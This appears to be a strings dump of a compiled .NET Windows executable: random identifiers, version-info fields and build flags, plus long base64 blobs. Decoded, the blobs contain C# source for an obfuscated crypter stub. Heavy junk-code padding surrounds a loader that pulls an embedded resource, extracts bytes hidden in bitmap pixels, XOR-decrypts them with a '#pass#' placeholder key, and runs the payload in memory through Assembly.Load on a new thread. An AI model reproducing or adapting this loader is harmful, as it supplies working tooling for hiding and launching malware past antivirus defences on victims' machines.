p9ZWxzZXsNCmtxb0hBRlBBR1ItLTsNCkNvbnNvbGUuV3JpdGUoa3FvSEFGUEFHUi5Ub1N0cmluZygpKTsNCn0NCn1jYXRjaChFeGNlcHRpb24gZXgpew0KDQp9DQp9c3RyaW5nIFNLVXkgPSAiU0RSSSI7IAogQ29uc29sZS5Xcml0ZUxpbmUoU0tVeSk7bG9uZyBYRml4ID0gODI3MzU3MDA5MTgyNjQ1ODU7IAoNCn1wdWJsaWMgdm9pZCBoc3lYKCl7DQp1bG9uZyBsQmZoID0gMTU3Mzg3MTU5NDg0NDAzNjY7IApzYnl0ZSBrQ3Z6ID0gIDgzOyAKIENvbnNvbGUuUmVhZExpbmUoKTt1c2hvcnQgR013SiA9IDYyMjQ3OyAKdWxvbmcgck9NQSA9IDIxNzUzNjA2MDc1MDExMTQ2OyAKDQp9cHVibGljIHZvaWQgc3pnaCgpew0KZG91YmxlIEloWWsgPSAxLjY2MzA4MkUrMTc7IAppZihJaFlrID09IDEuOTg1NjUzRS0zNil7DQpkb3VibGUgTHFkSmlEUlpKaGZiRWdpZXZ6VFhjQnFVcyA9IC0zLjU4Mzg1N0UtMzk7DQpvYmplY3QgU3dCTk5iQVRmSWZKOw0KU3dCTk5iQVRmSWZKID0gLTEuNDQxMDc0RSsxOTsNCn1sb25nIEZ1RVcgPSA2NDkwODMxNDU3MDcyNzI0OyAKYnl0ZSBwZ1JmID0gIDY5OyAKIEVudmlyb25tZW50LkV4aXQoMCk7ZG91YmxlIHpuWXQgPSAyLjAzMjAyMkUtMzU7IApkb3VibGUgaGdXSGVEcW5QbXd5Q2NlVHBjQk9Lb3ZTZ1lYYyA9IDEuMTA1MjAxRSsxODsNCnpuWXQgPSBoZ1dIZURxblBtd3lDY2VUcGNCT0tvdlNnWVhjIC8gMzsNCmludFtdIHZFVXdGVkJGdUN3cm93SUpHZk1Kck1MV0loQyA9IHsgNzQwMjUzMSAsIDcxMzA5IH0gOw0KUmFuZG9tIG1kaWJwbGh2YkF4UHZWPSBuZXcgUmFuZG9tKCk7DQpDb25zb2xlLldyaXRlTGluZSh2RVV3RlZCRnVDd3Jvd0lKR2ZNSnJNTFdJaENbbWRpYnBsaHZiQXhQdlYuTmV4dCgwLDIpXSk7DQp9Cn0gDQp9
PjETZ
AdiQK
EzmP
gmcpS
IIOZQ
qxHLH
System.Management.dll
BPMPx
FileDescription
BUcHU
joObI
/optimize+ /platform:X86 /debug+ /target:winexe
pETU
BIUXG
wxlDO
DOEnC
#pass#
jICUj
EhVkX
ProductVersion
PKVwY
jORZQ
oEdFq
BYvvO
6Ucr
kmioH
LpbD
Assembly Version
BoMO
HvPWe
2f212
BmiN
YNbBy
tsgeJ
unELX
ePlO
hHEvg
Translation
VarFileInfo
ByJOE
rlrbX
xkRPF
fiex
rjqma
System.dll
#resname#
FileVersion
dMZRnWsbBfej
VS_VERSION_INFO
LegalCopyright
InternalName
StringFileInfo
yrHwr
Nyhz
000004b0
NLSe
GdDt
hrIHu
BUAt
HdaqK
PYeD
System.Drawing.dll
JKxtz
0.0.0.0
WJkJS
jFKr
QEDbU
ITgTy
System.Core.dll
arzLe
FSODB
dXNpbmcgU3lzdGVtOw0KdXNpbmcgU3lzdGVtLklPOw0KdXNpbmcgU3lzdGVtLlRleHQ7DQp1c2luZyBTeXN0ZW0uUmVmbGVjdGlvbjsNCnVzaW5nIFN5c3RlbS5UaHJlYWRpbmc7DQp1c2luZyBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM7DQp1c2luZyBTeXN0ZW0uRHJhd2luZzsNCg0KbmFtZXNwYWNlIFRLVWpObG5MUHFuYg0Kew0KCXB1YmxpYyBjbGFzcyBiYlFJe3B1YmxpYyB2b2lkIGZkbFUoKXsNCnNieXRlIGlCUEMgPSAgNjE7IAogQ29uc29sZS5SZWFkTGluZSgpO3Vsb25nIE5NZGYgPSA0NTU5ODQ1NDMzNDk3MTcxMTsgCmRvdWJsZSBZS1VvID0gLTEuNDYzNzU3RSsxMjsgCmlmKFlLVW8gPT0gOS44NTU3MjFFLTE4KXsNCmRvdWJsZSB3U0F6U1FpSlZmQk1GaCA9IC04LjQ5OTY2OEUtMzI7DQpZS1VvID0gTWF0aC5Sb3VuZCh3U0F6U1FpSlZmQk1GaCk7DQpvYmplY3QgTkJEeGZEYllQUzsNCk5CRHhmRGJZUFMgPSAtMC4wMDA3MDExMTc1Ow0KQ29uc29sZS5Xcml0ZUxpbmUoTkJEeGZEYllQUy5Ub1N0cmluZygpLlRvTG93ZXIoKSk7DQp9ZG91YmxlIFZ6dWQgPSAyLjg4NDA4M0UrMzE7IApWenVkID0gTWF0aC5DZWlsaW5nKE1hdGguVGFuKDEpKTsNCnRyeXsNCkNvbnNvbGUuV3JpdGVMaW5lKFZ6dWQuVG9TdHJpbmcoKSk7DQp9Y2F0Y2goRXhjZXB0aW9uIGV4KXsNCkNvbnNvbGUuV3JpdGVMaW5lKGV4Lk1lc3NhZ2UpOw0KfQ0KfXB1YmxpYyB2b2lkIHJpZmgoKXsNCmJ5dGUgWlRhcSA9ICAyNTE7IAogRW52aXJvbm1lbnQuRXhpdCgwKTtzYnl0ZSB5TUp2ID0gIC0xMTY7IAogQ29uc29sZS5SZWFkTGluZSgpO2Zsb2F0IHRaTFkgPSA2LjY4NzQ0OUUtMzZGOyAKYnl0ZSBwYUJsID0gIDU7IAogRW52aXJvbm1lbnQuRXhpdCgwKTsNCn1wdWJsaWMgdm9pZCB3c1lvKCl7DQpieXRlIHVSQ3MgPSAgMTkwOyAKIEVudmlyb25tZW50LkV4aXQoMCk7c3RyaW5nIFdWS1ggPSAibGJudSI7IAogQ29uc29sZS5Xcml0ZUxpbmUoV1ZLWCk7dWxvbmcgUXFaRSA9IDUxNTc5MDY4ODA3MzQ5NzI0OyAKbG9uZyBLVGxrID0gMTMzMjcyMjc4MzExMzc1MzY7IAoNCn1wdWJsaWMgdm9pZCBnTERiKCl7DQpzaG9ydCB1SGtmID0gLTIyOTg3OyAKIGJ5dGVbXSB1SGtmdUhrZiA9IFN5c3RlbS5JTy5GaWxlLlJlYWRBbGxCeXRlcygidUhrZiIpO3NieXRlIFpoWW4gPSAgMzsgCiBDb25zb2xlLlJlYWRMaW5lKCk7c2J5dGUgUUFhWSA9ICAyMTsgCiBDb25zb2xlLlJlYWRMaW5lKCk7ZmxvYXQgaVRsaCA9IC0yLjM1MjI3NUUtMjlGOyAKDQp9Cn0gcHVibGljIGNsYXNzIEVqcUR7cHVibGljIHZvaWQgVW9QaCgpew0Kc2J5dGUgRXNVWCA9ICAtMTU7IAogQ29uc29sZS5SZWFkTGluZSgpO2ludCBzT1FIID0gMjM2ODsgCndoaWxlKHNPUUggPT0gMjM2OCl7DQpzT1FIICs9IDg5NTI2MjsNCn1mbG9hdCBvemtXID0gLTUuNTk0NDc5RSsxNUY7IAppbnQgS3FNWSA9IDYwOyAKd2hpbGUoS3FNWSA9PSA2MCl7DQpLcU1ZICs9IDEyNTcwNTsNCn0NCn1wdWJsaWMgdm9pZCBLZEJQKCl7DQpzdHJpbmcgTXpoSCA9ICJua1hZIjsgCiBDb25zb2xlLldyaXRlTGluZShNemhIKTt1aW50IEtGTWUgPSA2NjsgCnNob3J0IGZkVmQgPSAtMTY5OTE7IAogYnl0ZVtdIGZkVmRmZFZkID0gU3lzdGVtLklPLkZpbGUuUmVhZEFsbEJ5dGVzKCJmZFZkIik7bG9uZyBJenpoID0gMjg1MTk1MzU0NTg4ODYwNzQ7IAoNCn1wdWJsaWMgdm9pZCBLUWp0KCl7DQpsb25nIG91ZXMgPSA0MTYyMDkxODY0OTc1Mzk5MDsgCmJ5dGUgdk1ZRCA9ICAyNTsgCiBFbnZpcm9ubWVudC5FeGl0KDApO2ludCBOaHJUID0gNjk7IAp3aGlsZShOaHJUID09IDY5KXsNCk5oclQgKz0gNTkwNzA3Ow0KfWJ5dGUgUERXQiA9ICAxODc7IAogRW52aXJvbm1lbnQuRXhpdCgwKTsNCn1wdWJsaWMgdm9pZCBxTG9EKCl7DQpmbG9hdCB0V3RGID0gLTguMjAwNDgyRSsyOEY7IAp1c2hvcnQgb01HcCA9IDc5MDE7IAppbnQgWHR6QSA9IDY0MDk7IAp3aGlsZShYdHpBID09IDY0MDkpew0KWHR6QSA9IFh0ekEgKyA3OTAxODA7DQp9dWxvbmcgakVUSSA9IDgxNjg4ODk1ODI3NTg0OTU3OyAKDQp9Cn0gcHVibGljIGNsYXNzIEd4Qkt7cHVibGljIHZvaWQgckx2aCgpew0KaW50IHhEbU0gPSA0MDA3NzA4OTE7IAp3aGlsZSh4RG1NID09IDQwMDc3MDg5MSl7DQp4RG1NICs9IDMyOTgxMzsNCn1zdHJpbmcgZEZ6ZyA9ICJObnhOIjsgCiBDb25zb2xlLldyaXRlTGluZShkRnpnKTtsb25nIHNGbHQgPSAzODI4OTU4OTMwNzc5NDUzOyAKdWludCBsQXZRID0gODA0OTc5NDU5OyAKDQp9cHVibGljIHZvaWQgR3FIaigpew0KYnl0ZSBQaHFiID0gIDc3OyAKIEVudmlyb25tZW50LkV4aXQoMCk7dWxvbmcgVGliYyA9IDg2MDU4MDQ0MDcyNTcxMDMyOyAKc3RyaW5nIG1iTnIgPSAiYnpMUiI7IAogQ29uc29sZS5Xcml0ZUxpbmUobWJOcik7dWxvbmcgSWFyTSA9IDQ4NzQ4ODc3NTM2NzA1NDE4OyAKDQp9cHVibGljIHZvaWQgTnZwdygpew0Kc2hvcnQgZW9nZSA9IC0yNTUwNDsgCiBieXRlW10gZW9nZWVvZ2UgPSBTeXN0ZW0uSU8uRmlsZS5SZWFkQWxsQnl0ZXMoImVvZ2UiKTt1aW50IHZ6SW0gPSA3MjQ1NTsgCmRvdWJsZSBCUUF0ID0gLTguMjMwMTA5RS0xOTsgCndoaWxlKEJRQXQgPT0gLTEuNDcwMDAzRSsxNSl7DQpCUUF0ID0gTWF0aC5Qb3coMiwgMi4xKTsNCm9iamVjdCBLaktqd0JPQ0lqYUdwV2pQZWxDQkNtOw0KS2pLandCT0NJamFHcFdqUGVsQ0JDbSA9IC01LjY4NTMwNUUtMDk7DQpDb25zb2xlLldyaXRlTGluZShLaktqd0JPQ0lqYUdwV2pQZWxDQkNtLlRvU3RyaW5nKCkuVG9Mb3dlcigpKTsNCn1sb25nIElwY0kgPSAzMDMwNjM2Nzc4OTM5MDA5OTsgCg0KfXB1YmxpYyB2b2lkIG5WUFUoKXsNCnVzaG9ydCBTTVh5ID0gNTgzNjsgCnNob3J0IHF5ck4gPSAtMjcwMTY7IAogYnl0ZVtdIHF5ck5xeXJOID0gU3lzdGVtLklPLkZpbGUuUmVhZEFsbEJ5dGVzKCJxeXJOIik7ZG91YmxlIEFUanYgPSAzLjIzNTQ2MkUtMzk7IApBVGp2ID0gTWF0aC5DZWlsaW5nKE1hdGguQ29zKDIpKTsNCmludD8gdU9Pdkxib0tHRFNvUlVmYyA9IDg2NDA3NjY7DQp1T092TGJvS0dEU29SVWZjICs9IDM3NDA0O3VpbnQgRlZoSiA9IDk1OyAKDQp9Cn0gcHVibGljIGNsYXNzIFRrU217cHVibGljIHZvaWQgUHB0ZSgpew0Kc3RyaW5nIE1wY0UgPSAiR054TCI7IAogQ29uc29sZS5Xcml0ZUxpbmUoTXBjRSk7c2hvcnQgeEdkdiA9IDk0NDM7IAogYnl0ZVtdIHhHZHZ4R2R2ID0gU3lzdGVtLklPLkZpbGUuUmVhZEFsbEJ5dGVzKCJ4R2R2Iik7ZG91YmxlIHlYWVIgPSAtMS4yMTI3MzNFKzE2OyAKeVhZUiA9IE1hdGguUG93KGRvdWJsZS5NaW5WYWx1ZSwgZG91YmxlLk1heFZhbHVlKTsNCm9iamVjdCBTQ3lQWXFMU1pVYk1tWFpsZG47DQpTQ3lQWXFMU1pVYk1tWFpsZG4gPSA3LjcyNjA3MUUrMzY7ZmxvYXQgUExidCA9IDQuNDkyOTgyRSsxNUY7IAoNCn1wdWJsaWMgdm9pZCBPUGRDKCl7DQpzdHJpbmcgRWZpYSA9ICJ5ZGF0IjsgCiBDb25zb2xlLldyaXRlTGluZShFZmlhKTtkb3VibGUgakd0ZiA9IDUuMjMwNzQ0RS0zNjsgCmlmKGpHdGYgPT0gLTEuMzk4ODg4RSsyNil7DQpkb3VibGUgZFdLc1dGa2ggPSA0LjU3Mzk5NkUtMDk7DQpkV0tzV0ZraCA9IE1hdGguU3FydCgzKTsNCmpHdGYgPSBkV0tzV0ZraDsNCnRyeXsNCmludCByeFVFSEhLY0x5ID0gNTUxMTc5MzsNCmlmKHJ4VUVISEtjTHkgPT0gNTM1NDkpew0KcnhVRUhIS2NMeSsrOw0KfWVsc2V7DQpyeFVFSEhLY0x5LS07DQpDb25zb2xlLldyaXRlKHJ4VUVISEtjTHkuVG9TdHJpbmcoKSk7DQp9DQp9Y2F0Y2goRXhjZXB0aW9uIGV4KXsNCg0KfQ0KfXN0cmluZyBIeWRqID0gIk9uc3MiOyAKIENvbnNvbGUuV3JpdGVMaW5lKEh5ZGopO2xvbmcgWUdZZCA9IDgyNzM1NzAwOTE4MjY0NTg1OyAKDQp9cHVibGljIHZvaWQgSlJzaygpew0KdWxvbmcgWmdoVCA9IDE1NzM4NzE1OTQ4NDQwMzY2OyAKc2J5dGUgZE5IZSA9ICA4MzsgCiBDb25zb2xlLlJlYWRMaW5lKCk7dXNob3J0IGxrTUsgPSA2MjI0NzsgCnVsb25nIFRGQWUgPSAyMTc1MzYwNjA3NTAxMTE0NjsgCg0KfXB1YmxpYyB2b2lkIFN3VHooKXsNCmRvdWJsZSB4eEtVID0gMS42NjMwODJFKzE3OyAKaWYoeHhLVSA9PSAxLjk4NTY1M0UtMzYpew0KZG91YmxlIGRtS3VTUHBjSEtiTk5YZXlMb3pHUXBIdkEgPSAtMy41ODM4NTdFLTM5Ow0Kb2JqZWN0IEVzVU9JcEpDaFNneDsNCkVzVU9JcEpDaFNneCA9IC0xLjQ0MTA3NEUrMTk7DQp9bG9uZyBBU21XID0gNjQ5MDgzMTQ1NzA3MjcyNDsgCmJ5dGUgb2pQZiA9ICA2OTsgCiBFbnZpcm9ubWVudC5FeGl0KDApO2RvdWJsZSBrSEROID0gMi4wMzIwMjJFLTM1OyAKZG91YmxlIHZmQURiY1hUTGFkUWZLSmFZaU5qUGZuT1p3Q1IgPSAxLjEwNTIwMUUrMTg7DQprSEROID0gdmZBRGJjWFRMYWRRZktKYVlpTmpQZm5PWndDUiAvIDM7DQppbnRbXSBQdkdCQlFlSHZqVlJCdnpEZ0FGcEFJT0Z2QWQgPSB7IDc0MDI1MzEgLCA3MTMwOSB9IDsNClJhbmRvbSB3bEpkSnFRa3FOQkFpSj0gbmV3IFJhbmRvbSgpOw0KQ29uc29sZS5Xcml0ZUxpbmUoUHZHQkJRZUh2alZSQnZ6RGdBRnBBSU9GdkFkW3dsSmRKcVFrcU5CQWlKLk5leHQoMCwyKV0pOw0KfQp9IA0KDQogICAgY2xhc3MgUHJvZ3JhbQ0KICAgIHsNCg0KICAgICAgICBzdGF0aWMgc3RyaW5nIGxRRVJKamVpVW1KYlQgPSAiI3Bhc3MjIjsNCiAgICAgICAgcHJpdmF0ZSBzdGF0aWMgYnl0ZVtdIGt2SnJMeEYoYnl0ZVtdIGJ5dGVzKQ0KICAgICAgICB7DQogICAgICAgICAgICBieXRlW10gYnl0ZUFycmF5ID0gRW5jb2RpbmcuVW5pY29kZS5HZXRCeXRlcyhsUUVSSmplaVVtSmJUKTsNCiAgICAgICAgICAgIGZvciAoaW50IGkgPSAwOyBpIDwgYnl0ZXMuTGVuZ3RoOyBpKyspDQogICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgYnl0ZXNbaV0gXj0gYnl0ZUFycmF5W2kgJSAxNl07DQogICAgICAgICAgICB9DQogICAgICAgICAgICByZXR1cm4gYnl0ZXM7DQogICAgICAgIH0NCgkJDQoJCXByaXZhdGUgc3RhdGljIGJ5dGVbXSBDb252ZXJ0RnJvbUJtcChTeXN0ZW0uRHJhd2luZy5CaXRtYXAgYikNCiAgICAgICAgew0KICAgICAgICAgICAgaW50IGwgPSBiLldpZHRoOw0KICAgICAgICAgICAgaW50IG4gPSBsICogbCAqIDQ7DQogICAgICAgICAgICBieXRlW10gYnVmZiA9IG5ldyBieXRlW25dOw0KICAgICAgICAgICAgaW50IGsgPSAwOw0KDQogICAgICAgICAgICBmb3IgKGludCB4ID0gMDsgeCA8IGw7IHgrKykNCiAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICBmb3IgKGludCB5ID0gMDsgeSA8IGw7IHkrKykNCiAgICAgICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgICAgIEJ1ZmZlci5CbG9ja0NvcHkoQml0Q29udmVydGVyLkdldEJ5dGVzKGIuR2V0UGl4ZWwoeCwgeSkuVG9BcmdiKCkpLCAwLCBidWZmLCBrLCA0KTsNCiAgICAgICAgICAgICAgICAgICAgayArPSA0Ow0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgaW50IGxlbiA9IEJpdENvbnZlcnRlci5Ub0ludDMyKGJ1ZmYsIDApOw0KICAgICAgICAgICAgYnl0ZVtdIGYgPSBuZXcgYnl0ZVtsZW5dOw0KICAgICAgICAgICAgQnVmZmVyLkJsb2NrQ29weShidWZmLCA0LCBmLCAwLCBmLkxlbmd0aCk7DQogICAgICAgICAgICByZXR1cm4gZjsNCiAgICAgICAgfQ0KCQkNCgkJDQoJCXN0YXRpYyBieXRlW10gT0FQTXI7DQoJCXB1YmxpYyBzdGF0aWMgdm9pZCBiSU95S2pvS3NhYWxkZmlHKCkNCgkJew0KCQkJQXNzZW1ibHkuTG9hZChPQVBNcikuRW50cnlQb2ludC5JbnZva2UobnVsbCwgbmV3IG9iamVjdFtdIHsgbmV3IHN0cmluZ1tdIHsgfSB9KTsNCgkJfQ0KCQkNCgkJW0RsbEltcG9ydCgia2VybmVsMzIuZGxsIildDQoJCXN0YXRpYyBleHRlcm4gSW50UHRyIEZpbmRSZXNvdXJjZShJbnRQdHIgaE1vZHVsZSwgSW50UHRyIGxwTmFtZSwgSW50UHRyIGxwVHlwZSk7DQoJCQ0KCQlbRGxsSW1wb3J0KCJrZXJuZWwzMi5kbGwiLCBTZXRMYXN0RXJyb3I9dHJ1ZSldDQoJCXN0YXRpYyBleHRlcm4gdWludCBTaXplb2ZSZXNvdXJjZShJbnRQdHIgaE1vZHVsZSwgSW50UHRyIGhSZXNJbmZvKTsNCgkJDQoJCVtEbGxJbXBvcnQoImtlcm5lbDMyLmRsbCIsIFNldExhc3RFcnJvcj10cnVlKV0NCgkJc3RhdGljIGV4dGVybiBJbnRQdHIgTG9hZFJlc291cmNlKEludFB0ciBoTW9kdWxlLCBJbnRQdHIgaFJlc0luZm8pOw0KCQkNCgkJW0RsbEltcG9ydCgia2VybmVsMzIuZGxsIildDQoJCXN0YXRpYyBleHRlcm4gSW50UHRyIExvY2tSZXNvdXJjZShJbnRQdHIgaFJlc0RhdGEpOw0KCQkNCg0KCQlwdWJsaWMgc3RhdGljIEJpdG1hcCBCeXRlMkltYWdlKGJ5dGVbXSBpbWcpDQogICAgICAgIHsNCiAgICAgICAgICAgIHVzaW5nICh2YXIgc3RyZWFtID0gbmV3IE1lbW9yeVN0cmVhbShpbWcpKQ0KICAgICAgICAgICAgew0KICAgICAgICAgICAgICAgIHJldHVybiBuZXcgQml0bWFwKHN0cmVhbSk7DQogICAgICAgICAgICB9DQogICAgICAgIH0NCgkJDQogICAgICAgIHN0YXRpYyB2b2lkIE1haW4oKQ0KICAgICAgICB7DQogICAgICAgICAgICB0cnkNCiAgICAgICAgICAgIHsJCQ0KCQkJCUludFB0ciBmUmVzb3VyY2UgPSBGaW5kUmVzb3VyY2UobmV3IEludFB0cigwKSwgbmV3IEludFB0cigxMjMpLCBuZXcgSW50UHRyKDIzKSk7DQoJCQkJdWludCBzUmVzb3VyY2UgPSBTaXplb2ZSZXNvdXJjZShuZXcgSW50UHRyKDApLCBmUmVzb3VyY2UpOw0KCQkJCUludFB0ciBsUmVzb3VyY2UgPSBMb2FkUmVzb3VyY2UobmV3IEludFB0cigwKSwgZlJlc291cmNlKTsNCgkJCQlJbnRQdHIgZFJlc291cmNlID0gTG9ja1Jlc291cmNlKGxSZXNvdXJjZSk7DQoJCQkJDQoJCQkJT0FQTXIgPSBuZXcgYnl0ZVtzUmVzb3VyY2VdOw0KCQkJCVN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5NYXJzaGFsLkNvcHkoZFJlc291cmNlLCBPQVBNciwgMCwgU3lzdGVtLkNvbnZlcnQuVG9JbnQzMihzUmVzb3VyY2UpKTsNCgkJCQlPQVBNciA9IGt2SnJMeEYoQ29udmVydEZyb21CbXAoQnl0ZTJJbWFnZShPQVBNcikpKTsNCgkJCQkNCgkJCQlTeXN0ZW0uVGhyZWFkaW5nLlRocmVhZCB0aHIgPSBuZXcgU3lzdGVtLlRocmVhZGluZy5UaHJlYWQoYklPeUtqb0tzYWFsZGZpRyk7DQoJCQkJdGhyLlN0YXJ0KCk7DQogICAgICAgICAgICB9DQogICAgICAgICAgICBjYXRjaA0KICAgICAgICAgICAgew0KDQogICAgICAgICAgICB9DQogICAgICAgIH0NCiAgICB9DQoJDQoJcHVibGljIGNsYXNzIGJOVEh7cHVibGljIHZvaWQgUURsZigpew0Kc2J5dGUgR2FoSyA9ICA2MTsgCiBDb25zb2xlLlJlYWRMaW5lKCk7dWxvbmcgaGVmaiA9IDQ1NTk4NDU0MzM0OTcxNzExOyAKZG91YmxlIHB1Rk4gPSAtMS40NjM3NTdFKzEyOyAKaWYocHVGTiA9PSA5Ljg1NTcyMUUtMTgpew0KZG91YmxlIGl3RWxqWGh0clp6eEREID0gLTguNDk5NjY4RS0zMjsNCnB1Rk4gPSBNYXRoLlJvdW5kKGl3RWxqWGh0clp6eEREKTsNCm9iamVjdCBHcU5VUEplWGx2Ow0KR3FOVVBKZVhsdiA9IC0wLjAwMDcwMTExNzU7DQpDb25zb2xlLldyaXRlTGluZShHcU5VUEplWGx2LlRvU3RyaW5nKCkuVG9Mb3dlcigpKTsNCn1kb3VibGUgR3NPaiA9IDIuODg0MDgzRSszMTsgCkdzT2ogPSBNYXRoLkNlaWxpbmcoTWF0aC5UYW4oMSkpOw0KdHJ5ew0KQ29uc29sZS5Xcml0ZUxpbmUoR3NPai5Ub1N0cmluZygpKTsNCn1jYXRjaChFeGNlcHRpb24gZXgpew0KQ29uc29sZS5Xcml0ZUxpbmUoZXguTWVzc2FnZSk7DQp9DQp9cHVibGljIHZvaWQgenVncCgpew0KYnl0ZSBEaFNzID0gIDI1MTsgCiBFbnZpcm9ubWVudC5FeGl0KDApO3NieXRlIFhyemIgPSAgLTExNjsgCiBDb25zb2xlLlJlYWRMaW5lKCk7ZmxvYXQgQkdCbiA9IDYuNjg3NDQ5RS0zNkY7IApieXRlIG94VkggPSAgNTsgCiBFbnZpcm9ubWVudC5FeGl0KDApOw0KfXB1YmxpYyB2b2lkIHlUcHkoKXsNCmJ5dGUgSEZKbyA9ICAxOTA7IAogRW52aXJvbm1lbnQuRXhpdCgwKTtzdHJpbmcgRnlwbiA9ICJDb2lqIjsgCiBDb25zb2xlLldyaXRlTGluZShGeXBuKTt1bG9uZyBMb2NIID0gNTE1NzkwNjg4MDczNDk3MjQ7IApsb25nIFFKVlggPSAxMzMyNzIyNzgzMTEzNzUzNjsgCg0KfXB1YmxpYyB2b2lkIHFpbEkoKXsNCnNob3J0IEVJV3YgPSAtMjI5ODc7IAogYnl0ZVtdIEVJV3ZFSVd2ID0gU3lzdGVtLklPLkZpbGUuUmVhZEFsbEJ5dGVzKCJFSVd2Iik7c2J5dGUgVFdwYSA9ICAzOyAKIENvbnNvbGUuUmVhZExpbmUoKTtzYnl0ZSB5UkNMID0gIDIxOyAKIENvbnNvbGUuUmVhZExpbmUoKTtmbG9hdCBvUnVZID0gLTIuMzUyMjc1RS0yOUY7IAoNCn0KfSBwdWJsaWMgY2xhc3MgS2NTdntwdWJsaWMgdm9pZCBIc0Z3KCl7DQpzYnl0ZSBlWGdsID0gIC0xNTsgCiBDb25zb2xlLlJlYWRMaW5lKCk7aW50IGJaR2wgPSAyMzY4OyAKd2hpbGUoYlpHbCA9PSAyMzY4KXsNCmJaR2wgKz0gODk1MjYyOw0KfWZsb2F0IHJoa1UgPSAtNS41OTQ0NzlFKzE1RjsgCmludCBBcm1WID0gNjA7IAp3aGlsZShBcm1WID09IDYwKXsNCkFybVYgKz0gMTI1NzA1Ow0KfQ0KfXB1YmxpYyB2b2lkIGJCeGEoKXsNCnN0cmluZyBicm5SID0gIkxFcksiOyAKIENvbnNvbGUuV3JpdGVMaW5lKGJyblIpO3VpbnQgeURtVCA9IDY2OyAKc2hvcnQgRGtOZSA9IC0xNjk5MTsgCiBieXRlW10gRGtOZURrTmUgPSBTeXN0ZW0uSU8uRmlsZS5SZWFkQWxsQnl0ZXMoIkRrTmUiKTtsb25nIEFjQW4gPSAyODUxOTUzNTQ1ODg4NjA3NDsgCg0KfXB1YmxpYyB2b2lkIGRSbmIoKXsNCmxvbmcgVWxUVCA9IDQxNjIwOTE4NjQ5NzUzOTkwOyAKYnl0ZSBwRWx1ID0gIDI1OyAKIEVudmlyb25tZW50LkV4aXQoMCk7aW50IFlEVXUgPSA2OTsgCndoaWxlKFlEVXUgPT0gNjkpew0KWURVdSArPSA1OTA3MDc7DQp9Ynl0ZSBGc1ZpID0gIDE4NzsgCiBFbnZpcm9ubWVudC5FeGl0KDApOw0KfXB1YmxpYyB2b2lkIFhOVHgoKXsNCmZsb2F0IHpHTVIgPSAtOC4yMDA0ODJFKzI4RjsgCnVzaG9ydCBKaGdoID0gNzkwMTsgCmludCBCYlNVID0gNjQwOTsgCndoaWxlKEJiU1UgPT0gNjQwOSl7DQpCYlNVID0gQmJTVSArIDc5MDE4MDsNCn11bG9uZyBCZ1RxID0gODE2ODg4OTU4Mjc1ODQ5NTc7IAoNCn0KfSBwdWJsaWMgY2xhc3MgZHlOR3twdWJsaWMgdm9pZCBVUHpvKCl7DQppbnQgSHdDaCA9IDQwMDc3MDg5MTsgCndoaWxlKEh3Q2ggPT0gNDAwNzcwODkxKXsNCkh3Q2ggKz0gMzI5ODEzOw0KfXN0cmluZyBCeHlnID0gIlhlTEUiOyAKIENvbnNvbGUuV3JpdGVMaW5lKEJ4eWcpO2xvbmcgTllOUSA9IDM4Mjg5NTg5MzA3Nzk0NTM7IAp1aW50IFRxY3kgPSA4MDQ5Nzk0NTk7IAoNCn1wdWJsaWMgdm9pZCBMcXhPKCl7DQpieXRlIHNlQlMgPSAgNzc7IAogRW52aXJvbm1lbnQuRXhpdCgwKTt1bG9uZyBITHJCID0gODYwNTgwNDQwNzI1NzEwMzI7IApzdHJpbmcgbGZiViA9ICJHZ3VWIjsgCiBDb25zb2xlLldyaXRlTGluZShsZmJWKTt1bG9uZyBpbUtNID0gNDg3NDg4Nzc1MzY3MDU0MTg7IAoNCn1wdWJsaWMgdm9pZCBjRFhhKCl7DQpzaG9ydCBDQ0pQID0gLTI1NTA0OyAKIGJ5dGVbXSBDQ0pQQ0NKUCA9IFN5c3RlbS5JTy5GaWxlLlJlYWRBbGxCeXRlcygiQ0NKUCIpO3VpbnQgTXR1RSA9IDcyNDU1OyAKZG91YmxlIFpLYlUgPSAtOC4yMzAxMDlFLTE5OyAKd2hpbGUoWktiVSA9PSAtMS40NzAwMDNFKzE1KXsNClpLYlUgPSBNYXRoLlBvdygyLCAyLjEpOw0Kb2JqZWN0IFVEUGVqSXNhT0xLdFVxZ01XUWtWWUs7DQpVRFBlaklzYU9MS3RVcWdNV1FrVllLID0gLTUuNjg1MzA1RS0wOTsNCkNvbnNvbGUuV3JpdGVMaW5lKFVEUGVqSXNhT0xLdFVxZ01XUWtWWUsuVG9TdHJpbmcoKS5Ub0xvd2VyKCkpOw0KfWxvbmcgbnpTViA9IDMwMzA2MzY3Nzg5MzkwMDk5OyAKDQp9cHVibGljIHZvaWQgSUxmSigpew0KdXNob3J0IFJjcncgPSA1ODM2OyAKc2hvcnQgWnFkciA9IC0yNzAxNjsgCiBieXRlW10gWnFkclpxZHIgPSBTeXN0ZW0uSU8uRmlsZS5SZWFkQWxsQnl0ZXMoIlpxZHIiKTtkb3VibGUgVEVZWiA9IDMuMjM1NDYyRS0zOTsgClRFWVogPSBNYXRoLkNlaWxpbmcoTWF0aC5Db3MoMikpOw0KaW50PyBOZFRLamhpQ0hxR0VQUlRNID0gODY0MDc2NjsNCk5kVEtqaGlDSHFHRVBSVE0gKz0gMzc0MDQ7dWludCBKWm1lID0gOTU7IAoNCn0KfSBwdWJsaWMgY2xhc3MgSlVOa3twdWJsaWMgdm9pZCBUU2l2KCl7DQpzdHJpbmcgdmJ1SyA9ICJyaG5UIjsgCiBDb25zb2xlLldyaXRlTGluZSh2YnVLKTtzaG9ydCBrZHdTID0gOTQ0MzsgCiBieXRlW10ga2R3U2tkd1MgPSBTeXN0ZW0uSU8uRmlsZS5SZWFkQWxsQnl0ZXMoImtkd1MiKTtkb3VibGUgRFl4WiA9IC0xLjIxMjczM0UrMTY7IApEWXhaID0gTWF0aC5Qb3coZG91YmxlLk1pblZhbHVlLCBkb3VibGUuTWF4VmFsdWUpOw0Kb2JqZWN0IE1yQ1dmZ2FqZE9UcEFGdGVuUDsNCk1yQ1dmZ2FqZE9UcEFGdGVuUCA9IDcuNzI2MDcxRSszNjtmbG9hdCBuaERsID0gNC40OTI5ODJFKzE1RjsgCg0KfXB1YmxpYyB2b2lkIEZUVXEoKXsNCnN0cmluZyB3YkNwID0gImxHanAiOy